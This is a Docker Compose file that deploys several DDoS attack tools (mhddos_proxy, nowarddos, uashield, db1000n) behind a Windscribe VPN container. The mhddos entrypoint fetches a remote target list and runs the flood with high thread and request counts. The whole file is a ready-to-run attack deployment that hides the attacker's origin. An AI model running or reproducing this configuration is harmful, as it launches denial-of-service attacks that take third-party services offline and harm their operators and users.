version: "3"
services:
  docker-windscribe:
    image: wiorca/docker-windscribe
    container_name: docker-windscribe
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=Europe/Kiev
      - WINDSCRIBE_USERNAME=${WINDSCRIBE_USERNAME}
      - WINDSCRIBE_PASSWORD=${WINDSCRIBE_PASSWORD}
      - WINDSCRIBE_PROTOCOL=udp
      - WINDSCRIBE_PORT=443
      - WINDSCRIBE_LOCATION=${WINDSCRIBE_LOCATION}
      - WINDSCRIBE_LANBYPASS=on
      - WINDSCRIBE_FIREWALL=on
      - VPN_PORT=9999
    volumes:
      - config:/config
    dns:
      - 8.8.8.8
    cap_add:
      - NET_ADMIN
    restart: unless-stopped 

  mhddos:
    depends_on: 
      - docker-windscribe
    restart: unless-stopped
    network_mode: "service:docker-windscribe"
    image: ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest
    # example command
    entrypoint: "python3 ./runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 2500 --rpc 2000 --debug"

  nowarddos:
    depends_on: 
      - docker-windscribe
    restart: unless-stopped
    network_mode: "service:docker-windscribe"
    image: maxrev/nowarddos:latest

  uashield:
    depends_on: 
      - docker-windscribe
    restart: unless-stopped
    network_mode: "service:docker-windscribe"
    image: ghcr.io/opengs/uashield:latest

  db1000n:
    depends_on: 
      - docker-windscribe
    restart: unless-stopped
    network_mode: "service:docker-windscribe"
    image: ghcr.io/arriven/db1000n:latest

  db1000n-advanced:
    depends_on: 
      - docker-windscribe
    restart: unless-stopped
    network_mode: "service:docker-windscribe"
    image: ghcr.io/arriven/db1000n-advanced:latest

volumes:
  config: {}